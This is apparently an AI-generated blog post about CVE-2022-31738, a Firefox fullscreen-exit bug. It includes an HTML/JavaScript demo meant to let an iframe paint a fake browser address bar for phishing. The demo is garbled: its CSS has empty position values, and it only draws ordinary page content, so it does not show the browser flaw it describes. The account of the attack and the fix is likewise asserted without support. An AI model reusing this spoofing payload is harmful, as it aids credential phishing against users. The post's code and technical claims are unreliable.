---
In May 2022, Mozilla patched a subtle but significant security bug: CVE-2022-31738. It affects Firefox < 101, Firefox ESR < 91.10, and Thunderbird < 91.10. The vulnerability didn't crash browsers or leak data directly; instead, it let malicious websites abuse how iframes exited fullscreen mode. This post breaks down what happened, how attackers could exploit it, and why it matters—with code and references.
What’s the Problem?
Fullscreen mode is meant to enhance user experience—think of watching videos or presentations. But it also comes with security restrictions. Browsers show a clear message when a site enters fullscreen and block web content from spoofing browser UI (like address bars).
CVE-2022-31738 centers on malicious iframes confusing the browser about whether fullscreen mode is actually active after exit. Worse, this made it possible to spoof the browser’s UI, leading to phishing and user deception.
Step 1: Main site loads a malicious iframe.
Step 2: Iframe requests fullscreen ("fullscreenElement" becomes active).
Step 3: Iframe cleverly exits fullscreen using JavaScript, but keeps rendering "as if" it controls the display.
Step 4: Browser doesn’t properly clear the previous fullscreen state. The iframe now paints fake chrome or UI elements, tricking the user—say, into thinking they see an address bar or a browser dialog.
Why is this bad?
Because usually, browsers strictly separate web content from browser UI. Any blur in that line opens the door for phishing or spoofing attacks—like a fake "enter your password" box that looks legit.
Below is a simple demo (do NOT use for malicious purposes)
<!DOCTYPE html>
<html>
<body>
<iframe id="evilframe" src="about:blank" style="border:none;width:100vw;height:100vh;"></iframe>
<script>
let iframe = document.getElementById('evilframe');
iframe.onload = function() {
let doc = iframe.contentDocument || iframe.contentWindow.document;
doc.body.innerHTML = '<button id="fs">Go Fullscreen!</button>';
doc.getElementById('fs').onclick = function() {
iframe.requestFullscreen().then(() => {
// Attacker exits fullscreen, but browser gets confused
document.exitFullscreen();
// Now, iframe can draw fake UI (address bar, dialogs, etc.)
doc.body.innerHTML += '<div style="position:fixed;top:;left:;width:100vw;height:50px;background:#fff;border-bottom:1px solid #ccc;z-index:9999;">🔒 https://secure-site.com</div>';;
});
};
}
</script>
</body>
</html>
How it works:
The iframe takes fullscreen, then programmatically exits.
- It immediately draws a fake browser "address bar" to trick the user—the browser UI is no longer protected.
Phish credentials or trick users into unsafe actions (even fake permission prompts).
This attack only works if the browser mishandles fullscreen state tracking—exactly what happened until Firefox 101.
Timeline, Impact, and Patching
- Reported: Early 2022 via Mozilla’s Bugzilla #1767067
- Patched: Firefox 101 was released on May 31, 2022 (release notes)
How Mozilla Fixed It
The fix? Tightening checks so pages (or iframes) can never trick the browser into thinking they’ve left fullscreen mode when they haven’t. If anything fails during exit, the browser forcibly clears all fullscreen state *and* removes the UI overlay from content, making spoofing impossible.
References and Further Reading
- Mozilla Security Advisory 2022-21
- Bugzilla #1767067 (fullscreen confusion)
- Full Disclosure List post (search for CVE-2022-31738)
Conclusion
CVE-2022-31738 is a reminder: even small bugs in browser UI-handling can lead to major user-trust problems. If your browser or mail client is out of date, update now. Developers: never trust your own UI—not when modern browsers are the only line between users and phishers.
Stay safe, and always check what’s in your address bar—don’t let a web page convince you otherwise.
*Original research and code demonstration by Assistant.*
Timeline
Published on: 12/22/2022 20:15:00 UTC
Last modified on: 01/03/2023 21:39:00 UTC